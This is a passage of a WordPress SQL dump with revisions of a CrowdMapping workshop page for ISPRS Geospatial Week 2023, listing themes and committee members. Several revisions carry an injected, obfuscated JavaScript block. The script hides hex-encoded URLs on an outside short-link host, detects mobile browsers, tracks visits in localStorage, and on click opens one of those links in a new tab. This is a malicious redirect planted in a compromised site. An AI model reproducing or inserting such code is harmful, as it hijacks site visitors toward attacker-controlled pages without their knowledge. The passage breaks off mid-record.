_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','CrowdMapping: Crowdsourcing for Global Mapping','','inherit','closed','closed','','2697-revision-v1','','','2022-10-09 04:11:27','2022-10-09 04:11:27','',2697,'https://gsw2023.com/?p=2701',0,'revision','',0),
(2702,1,'2022-10-09 04:23:10','2022-10-09 04:23:10','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2699\" img_size=\"1000x600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]\r\n<h5 style=\"text-align: justify; color: black;\">Crowdsourcing techniques have been widely employed to detect and map land surface dynamics, such as land use and land cover, human settlements, buildings, and crisis situations. These techniques are applied at regional and global scales to complement or substitute other specialized and expensive physical sensors aboard satellites, unmanned aerial vehicles, ground vehicles, and robots. This workshop will provide a forum for discussion of recent advances in crowdsourcing techniques for mapping global environments. Our goal is to bring together experts in global mapping who utilize Volunteered Geographic Information (VGI), User-Generated-Content, and Citizen Science to establish a common and sustainable ecosystem that will consolidate multi-disciplinary efforts from researchers and practitioners. CrowdMapping will be a key component of the ISPRS Geospatial Week 2023 hosted by the Arab Academy for Science, Technology and Maritime Transport, alongside other related workshops. Since this will be the first joint workshop of the organising team, we propose to allocate a single whole day of the ISPRS Geospatial Week for oral presentations, poster sessions, and hands-on demos aligned to the CrowdMapping context.</h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\r\n[/vc_column_text][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][dt_portfolio_masonry image_border_radius=\"0px\" project_icon_border_width=\"0px\" posts_offset=\"0\" category=\"\"][vc_separator][vc_row_inner][vc_column_inner width=\"1/2\"][bsf-info-box icon_size=\"32\"]\r\n<h5><strong>Themes of event:</strong>\r\n<strong>⦁ Land use and land cover mapping using crowdsourcing</strong>\r\n<strong>⦁ Fusion of multi-source data for land use monitoring and change detection</strong>\r\n<strong>⦁ Integration of VGI and deep learning</strong>\r\n<strong>⦁ Generation and extraction of high-quality training data from VGI</strong>\r\n<strong>⦁ Satellite image analysis using crowdsourcing data for collaborative mapping </strong>\r\n<strong>⦁ Measures, indicators, and evaluation methods of VGI quality</strong>\r\n<strong>⦁ 3D building reconstruction from VGI data</strong>\r\n<strong>⦁ Crowdsourcing-based indoor mapping</strong>\r\n<strong>⦁ Building semantic enrichment using social media data</strong>\r\n<strong>⦁ OpenStreetMap enrichment</strong>\r\n<strong>⦁ Crisis mapping using web enabled crowdsourcing</strong>\r\n<strong>⦁ Case study of VGI and crowdsourcing disaster relief</strong>\r\n<strong>⦁ Automatically mapping human settlements in rural areas</strong>\r\n<strong>⦁ Humanitarian cartography using OpenStreetMap</strong>\r\n<strong>⦁ Unified platform for earth observation using Citizen Science</strong>\r\n<strong>⦁ Extraction of urban functional regions from location-enabled social networks</strong></h5>\r\n[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/2\"][bsf-info-box][/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','CrowdMapping: Crowdsourcing for Global Mapping','','inherit','closed','closed','','2697-revision-v1','','','2022-10-09 04:23:10','2022-10-09 04:23:10','',2697,'https://gsw2023.com/?p=2702',0,'revision','',0),
(2703,1,'2022-10-09 04:27:28','2022-10-09 04:27:28','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2699\" img_size=\"1000x600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]\r\n<h5 style=\"text-align: justify; color: black;\">Crowdsourcing techniques have been widely employed to detect and map land surface dynamics, such as land use and land cover, human settlements, buildings, and crisis situations. These techniques are applied at regional and global scales to complement or substitute other specialized and expensive physical sensors aboard satellites, unmanned aerial vehicles, ground vehicles, and robots. This workshop will provide a forum for discussion of recent advances in crowdsourcing techniques for mapping global environments. Our goal is to bring together experts in global mapping who utilize Volunteered Geographic Information (VGI), User-Generated-Content, and Citizen Science to establish a common and sustainable ecosystem that will consolidate multi-disciplinary efforts from researchers and practitioners. CrowdMapping will be a key component of the ISPRS Geospatial Week 2023 hosted by the Arab Academy for Science, Technology and Maritime Transport, alongside other related workshops. Since this will be the first joint workshop of the organising team, we propose to allocate a single whole day of the ISPRS Geospatial Week for oral presentations, poster sessions, and hands-on demos aligned to the CrowdMapping context.</h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\r\n[/vc_column_text][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][dt_portfolio_masonry image_border_radius=\"0px\" project_icon_border_width=\"0px\" posts_offset=\"0\" category=\"\"][vc_separator][vc_row_inner][vc_column_inner width=\"1/2\"][bsf-info-box icon_size=\"0\"]&lt;h5style=\"text-align:justify; color:red;\" &gt;<strong>Themes of event:</strong>\r\n<h6><strong>⦁ Land use and land cover mapping using crowdsourcing</strong>\r\n<strong>⦁ Fusion of multi-source data for land use monitoring and change detection</strong>\r\n<strong>⦁ Integration of VGI and deep learning</strong>\r\n<strong>⦁ Generation and extraction of high-quality training data from VGI</strong>\r\n<strong>⦁ Satellite image analysis using crowdsourcing data for collaborative mapping </strong>\r\n<strong>⦁ Measures, indicators, and evaluation methods of VGI quality</strong>\r\n<strong>⦁ 3D building reconstruction from VGI data</strong>\r\n<strong>⦁ Crowdsourcing-based indoor mapping</strong>\r\n<strong>⦁ Building semantic enrichment using social media data</strong>\r\n<strong>⦁ OpenStreetMap enrichment</strong>\r\n<strong>⦁ Crisis mapping using web enabled crowdsourcing</strong>\r\n<strong>⦁ Case study of VGI and crowdsourcing disaster relief</strong>\r\n<strong>⦁ Automatically mapping human settlements in rural areas</strong>\r\n<strong>⦁ Humanitarian cartography using OpenStreetMap</strong>\r\n<strong>⦁ Unified platform for earth observation using Citizen Science</strong>\r\n<strong>⦁ Extraction of urban functional regions from location-enabled social networks</strong></h6>\r\n[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/2\"][bsf-info-box icon_size=\"0\"]\r\n<h5 style=\"text-align: justify; color: red;\"><strong>Scientific Committee:</strong></h5>\r\n<h6><strong>⦁ João Porto de Albuquerque, University of Glasgow, UK</strong>\r\n<strong>⦁ Jamal Jokar Arsanjani, Aalborg University, Denmark</strong>\r\n<strong>⦁ Ana Basiri, University of Glasgow, UK</strong>\r\n<strong>⦁ Lucy Bastin, Aston University, UK</strong>\r\n<strong>⦁ Alexander Brenning, Friedrich Schiller University, Germany</strong>\r\n<strong>⦁ Cidália Fonte, Universidade de Coimbra, Portugal</strong>\r\n<strong>⦁ Jukka Krisp, Universität Augsburg, Germany</strong>\r\n<strong>⦁ Pascal Neis, University of Applied Sciences Mainz, 